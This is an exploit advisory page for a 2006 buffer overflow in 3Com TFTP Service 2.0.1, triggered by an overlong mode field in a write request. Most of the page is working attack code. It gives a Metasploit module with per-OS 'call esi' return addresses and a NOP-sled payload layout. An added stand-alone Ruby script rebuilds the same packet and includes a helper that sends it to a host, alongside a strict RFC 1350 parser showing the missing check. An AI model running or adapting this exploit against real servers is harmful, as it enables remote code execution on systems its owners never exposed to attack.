3comtftp.txt

Date: 06 Dec 2006
Reported by: Kurt Grutzmacher
Type: packetstorm
Source: packetstormsecurity.com

3Com TFTP Service (3CTftpSvc) version 2.0.1 suffers from a buffer overflow when the transfer-mode ("type") field of a TFTP write request (WRQ) is overly long. The server does not need write access enabled for the request to reach the vulnerable code. The attacker controls ESI, so a "call esi" address in ws2help.dll is used to return into the attacker-supplied buffer.



Code

Doesn't look like SEH is being overwritten, so I'm having trouble getting this to work with DEP-enabled XPSP2 and 2K3. Tested on XPSP2 and Win2K. Includes offsets for NT, 2K and XP (call esi).

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

```ruby
require 'msf/core'

module Msf

class Exploits::Windows::Tftp::ThreeCeeTftpSvc_Overflow < Msf::Exploit::Remote

  include Exploit::Remote::Udp

  def initialize(info = {})
    super(update_info(info,
      'Name'        => '3CTftpSvc Server 2.0.1 Long Request Buffer Overflow',
      'Description' => %q{
          3Com TFTP Service version 2.0.1 suffers from a long type buffer
        overflow during a write TFTP request. Does not require write access
        to be enabled on the server.

        Attacker controls ESI.

        Liu Qixu of NCNIPC published this vulnerability.
      },
      'Author'      => 'grutz [at] jingojango.net',
      'Version'     => '$$',
      'References'  =>
        [
          ['URL', 'http://support.3com.com/software/utilities_for_windows_32_bit.htm'],
          ['BID', '21301'],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'     =>
        {
          'Space'           => 440,
          'BadChars'        => "\x00",   # the mode field is NUL-terminated
          'StackAdjustment' => -3500,
        },
      'Platform'    => 'win',

      'Targets'     =>
        [
          ['Windows 2000 All SP English', { 'Ret' => 0x750217ae } ], # call esi ws2help
          ['Windows XP SP2 English',      { 'Ret' => 0x71aa1b22 } ], # call esi ws2help
          ['Windows NT SP5/6 English',    { 'Ret' => 0x776a117e } ], # call esi ws2help
        ],

      'DefaultTarget'  => 0,
      'Privileged'     => false,
      'DisclosureDate' => 'Nov 27 2006'

    ))

    register_options(
      [
        Opt::RPORT(69)
      ], self)

  end

  def exploit
    connect_udp

    print_status("Trying target #{target.name}...")

    # WRQ (opcode 2), a one-character filename, its NUL terminator, then an
    # overlong "mode" field: 473 bytes of NOPs, the return address (call esi
    # in ws2help.dll) and the terminating NUL.
    sploit =
      "\x00\x02" +
      Rex::Text.rand_text_english(1, payload_badchars) +
      "\x00" +
      make_nops(473) +
      [target.ret].pack('V') +
      "\x00"

    # Drop the encoded payload into the NOP sled at offset 9 (five NOPs in);
    # 'Space' => 440 keeps it clear of the return address at offset 477.
    sploit[9, payload.encoded.length] = payload.encoded

    udp_sock.put(sploit)

    disconnect_udp
  end

end
end
```

--
..:[ grutz at jingojango dot net ]:..
GPG fingerprint: 5FD6 A27D 63DB 3319 140F B3FB EC95 2A03 8CB3 ECB4
"There's just no amusing way to say, 'I have a CISSP'."
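The request layout the module builds, recreated as a stand-alone Ruby script that needs no Metasploit (an added example written for this page, not grutz's module or any 3Com code): it assembles the same WRQ with the overlong mode field, reports where the return address lands (2 + 1 + 1 + 473 = offset 477), and pairs it with a strict RFC 1350 request parser of the kind that would have rejected the packet. The 16-byte 0xCC placeholder payload, the send_trigger helper and the 255-byte filename limit are assumptions for illustration; the 3Com server's own code is not public, so the parser shows the missing check, not the vendor's fix.

```ruby
# Stand-alone model of the 3CTftpSvc 2.0.1 WRQ trigger (added example, not the
# original Metasploit module) plus a strict RFC 1350 request parser showing the
# validation a TFTP server needs on the mode field.
require 'socket'

NOP_COUNT     = 473   # NOP sled length used by the module
PAYLOAD_SPACE = 440   # 'Space' from the module's payload options
PAYLOAD_OFF   = 9     # module writes payload.encoded at sploit[9, ...]
RFC1350_MODES = %w[netascii octet mail].freeze

# "call esi" addresses in ws2help.dll, per target, copied from the module.
TARGETS = {
  "Windows 2000 All SP English" => 0x750217ae,
  "Windows XP SP2 English"      => 0x71aa1b22,
  "Windows NT SP5/6 English"    => 0x776a117e,
}.freeze

# Offset within the datagram where the return address is placed:
# 2 (opcode) + 1 (filename) + 1 (NUL) + NOP sled.
def ret_offset
  2 + 1 + 1 + NOP_COUNT
end

# Build the WRQ trigger exactly as the module lays it out. +payload+ is any
# binary string of at most PAYLOAD_SPACE bytes containing no NUL (the only bad
# character, because the mode field is NUL-terminated). The default is a
# constructed 0xCC placeholder, not shellcode (assumption for illustration).
def build_trigger(ret, payload: "\xcc".b * 16)
  raise ArgumentError, "payload too large" if payload.bytesize > PAYLOAD_SPACE
  raise ArgumentError, "payload contains NUL" if payload.include?("\x00")

  pkt = "\x00\x02".b                # opcode 2 = WRQ
  pkt << "A".b                      # one-byte filename
  pkt << "\x00".b                   # filename terminator
  pkt << "\x90".b * NOP_COUNT       # overlong "mode" field: NOP sled
  pkt << [ret].pack("V")            # return address -> call esi
  pkt << "\x00".b                   # mode terminator
  pkt[PAYLOAD_OFF, payload.bytesize] = payload   # payload inside the sled
  pkt
end

# Strict parser of the RFC 1350 RRQ/WRQ header: exactly two NUL-terminated
# fields, bounded filename, and a mode drawn from the three RFC values. A server
# that did this would never copy 477 bytes of "mode" into a fixed buffer.
# The 255-byte filename bound is an assumption, not an RFC limit.
def parse_request(pkt, max_filename: 255)
  pkt = pkt.b
  raise ArgumentError, "short packet" if pkt.bytesize < 4
  opcode = pkt.unpack("n").first
  raise ArgumentError, "not RRQ/WRQ" unless [1, 2].include?(opcode)

  fields = pkt[2..-1].split("\x00", -1)
  # Expect filename, mode and an empty remainder after the final NUL.
  unless fields.size == 3 && fields[2].empty?
    raise ArgumentError, "malformed fields"
  end
  filename, mode = fields
  if filename.empty? || filename.bytesize > max_filename
    raise ArgumentError, "bad filename length"
  end
  unless RFC1350_MODES.include?(mode.downcase)
    raise ArgumentError, "unknown mode (#{mode.bytesize} bytes)"
  end

  { opcode: opcode, filename: filename, mode: mode.downcase }
end

# Send the trigger to a 3CTftpSvc listener (UDP/69 as in the module). Helper for
# completeness; it is not exercised offline. Returns the datagram size.
def send_trigger(host, ret, port: 69)
  pkt = build_trigger(ret)
  sock = UDPSocket.new
  sock.send(pkt, 0, host, port)
  sock.close
  pkt.bytesize
end

if __FILE__ == $0
  trig = build_trigger(TARGETS["Windows 2000 All SP English"])
  puts "trigger: #{trig.bytesize} bytes, ret at offset #{ret_offset}"
  begin
    parse_request(trig)
  rescue ArgumentError => e
    puts "strict parser rejects it: #{e.message}"
  end
end
```

Running the script prints the datagram size (482 bytes) and the return-address offset, then shows the strict parser refusing the packet because its mode field is not one of netascii, octet or mail; a legitimate `"\x00\x02A\x00octet\x00"` request parses normally.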
